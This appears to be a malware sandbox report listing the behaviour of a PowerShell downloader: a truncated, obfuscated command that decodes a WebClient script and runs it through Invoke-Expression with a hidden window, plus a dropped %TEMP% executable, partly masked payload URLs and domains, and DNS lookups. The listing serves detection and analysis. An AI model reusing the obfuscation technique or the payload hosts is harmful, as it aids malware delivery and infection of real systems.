Technical Information
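- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " .( $enV:CoMspEc[4,15,25]-jOiN'') ([stRinG]::joIn( '',[char[]] ( 36, 97,106, 122 ,61, 110,101, 119 , 45, 111 , 98,106 , 101,99 , 116, 32 ,78 ,101 ,116 ,46 , 87 , 101 , 98, 67,108 ,105 ,101 , 1...
  (Note: the command line is truncated in this listing. Characters 4, 15 and 25 of a default %ComSpec% value (C:\WINDOWS\system32\cmd.exe) spell "Iex", i.e. Invoke-Expression, and the visible character codes decode to `$ajz=new-object Net.WebClie`, so the command rebuilds a script from a numeric array and evaluates it. PowerShell script block logging records the decoded script, which the process command line alone does not show.)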
- %TEMP%\872.exe
- %TEMP%\872.exe
- 'es#####emocrata.com.br':80
- 'es#####emocrata.com.br':443
- 'pk#.goog':80
- 'j-##ill.ru':80
- http://www.es#####emocrata.com.br/wp-content/o0in4Y/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.j-##ill.ru/kLp8gFsh/
- http://j-##ill.ru/kLp8gFsh/
- 'es#####emocrata.com.br':443
- DNS ASK es#####emocrata.com.br
- DNS ASK pk#.goog
- DNS ASK st###eforce.one
- DNS ASK sh####lisharma.com
- DNS ASK j-##ill.ru
- DNS ASK sh#####kskitchen.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " .( $enV:CoMspEc[4,15,25]-jOiN'') ([stRinG]::joIn( '',[char[]] ( 36, 97,106, 122 ,61, 110,101, 119 , 45, 111 , 98,106 , 101,99 , 116, 32 ,78 ,101 ,116 ,46 , 87 , 101 , 98, 67,108 ,105 ,101 , 1...' (with hidden window)